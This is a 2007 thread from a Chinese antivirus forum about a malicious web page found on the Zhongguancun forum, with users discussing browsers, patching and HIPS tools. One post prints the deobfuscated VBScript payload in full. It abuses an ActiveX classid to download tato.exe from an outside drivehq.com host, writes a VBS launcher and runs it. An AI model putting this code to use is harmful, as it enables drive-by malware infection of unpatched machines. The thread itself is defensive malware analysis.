楼主: 天命无极
收起左侧

[病毒样本] 中关村论坛有毒!

[复制链接]
promised
发表于 2007-3-24 23:47:53 | 显示全部楼层
原帖由 alainhenri 于 2007-3-24 23:38 发表

拜托.对于这种利用系统漏洞的网页挂的马.用非ie内核的浏览器就没有问题.如Firefox.

为啥我用遨游对上述情况没问题。。。。。。。。。
alainhenri
发表于 2007-3-24 23:51:45 | 显示全部楼层
原帖由 promised 于 2007-3-24 23:47 发表

为啥我用遨游对上述情况没问题。。。。。。。。。

因为你的系统打了补丁.就没有问题.对于这些挂马的网站都是利用系统的已知漏洞.
icka
发表于 2007-3-24 23:52:14 | 显示全部楼层
还原后的代码为

  1. on error resume next
  2. curl="http://chinare.drivehq.com/tato.exe"
  3. fname1="tato.exe"
  4. fname2="tato.vbs"
  5. Set df = document.createElement("object")
  6. df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  7. str="Microsoft.XMLHTTP"
  8. Set x = df.CreateObject(str,"")
  9. C1="Ado"
  10. C2="db."
  11. C3="str"
  12. C4="eam"
  13. str1=C1&C2&C3&C4
  14. str5=str1
  15. set S = df.createobject(str5,"")
  16. S.type = 1
  17. str6="GET"
  18. x.Open str6, curl, False
  19. x.Send
  20. s1="Script"
  21. s2="ing."
  22. s3="File"
  23. s4="SystemObject"
  24. s0=s1+s2+s3+s4
  25. set F = df.createobject(s0,"")
  26. set tmp = F.GetSpecialFolder(2)
  27. fname1= F.BuildPath(tmp,fname1)
  28. S.open
  29. S.write x.responseBody
  30. S.savetofile fname1,2
  31. S.close
  32. fname2= F.BuildPath(tmp,fname2)
  33. Set ts = F.OpenTextFile(fname2, 2, True)
  34. ts.WriteLine "Set Shell = CreateObject(""Wscript.Shell"")"
  35. sql="Shell.Run("""+fname1+""")"
  36. ts.WriteLine sql
  37. ts.WriteLine "set Shell=Nothing"
  38. ts.close
  39. if F.FileExists(fname1)=true then
  40. if F.FileExists(fname2)=true then
  41.     sha="Shell.App"
  42.     shb=sha
  43.     set Q = df.createobject(shb+"lication","")
  44.     Q.ShellExecute fname2,"","","open",0
  45. end if
  46. end if
复制代码
promised
发表于 2007-3-24 23:54:24 | 显示全部楼层
原帖由 alainhenri 于 2007-3-24 23:51 发表

因为你的系统打了补丁.就没有问题.对于这些挂马的网站都是利用系统的已知漏洞.

LZ安全意识还是不够啊
天命无极
头像被屏蔽
 楼主| 发表于 2007-3-24 23:54:53 | 显示全部楼层
原帖由 solcroft 于 2007-3-24 23:38 发表
本来想编辑帖子,却不小心删了
反正火狐也不难用,界面本来就和IE蛮相似。我几个比较菜鸟的朋友我都推荐他们用火狐,倒也用得满顺的。


嗯。火狐让我感觉不适应的主要是书签功能,开新书签是在原窗口而不是像傲游新开窗口,另外火狐的书签垃圾太多了,其它都还好!
天命无极
头像被屏蔽
 楼主| 发表于 2007-3-24 23:56:53 | 显示全部楼层
原帖由 promised 于 2007-3-24 23:54 发表

LZ安全意识还是不够啊


这倒是,我一直以来都不喜欢自动更新的,都是SP2没变!汗!!!下次要改,不然总有一天会挂!
alainhenri
发表于 2007-3-24 23:58:26 | 显示全部楼层
原帖由 icka 于 2007-3-24 23:52 发表
还原后的代码为

on error resume next
curl="http://chinare.drivehq.com/tato.exe"
fname1="tato.exe"
fname2="tato.vbs"
Set df = document.createElement("objec ...

你好啊.呵呵在这里也可见到你.可以请教下解密的思路吗?
icka
发表于 2007-3-24 23:59:24 | 显示全部楼层
其实不更新,然后按个HIPS软件,玩玩也不错,否则一直是静悄悄的,只有手动运行病毒才能看到那些让人心跳的提示.不爽.不过就担心万一一个不小心没处理好,硬盘的东西太多了.否则真想把补丁都卸载掉
spiha
头像被屏蔽
发表于 2007-3-25 00:07:48 | 显示全部楼层
FF根本没用 除了那所谓的非IE内核 资源占用又差 所谓速度快只是做了点小手脚而已 在浏览器上面JJYY不如用好hips
就算是下载的软件谁也不能保证没毒 网马打满补丁就算是IE也不会中

如果说资源占用和速度  还不如opera....


刚打满补丁的机器去用IE和TW访问都没事= =.. ... 真是 ...
蓝色牛仔裤
发表于 2007-3-25 00:08:39 | 显示全部楼层

回复 #36 天命无极 的帖子

不喜欢自动更新可以用360安全卫士检测系统漏洞再下载更新的..我就是这样, 补丁很全, 上过很多毒网都能全身而退..
PS : 我用IE内核浏览器, TW.
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-11 02:29 , Processed in 0.088650 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表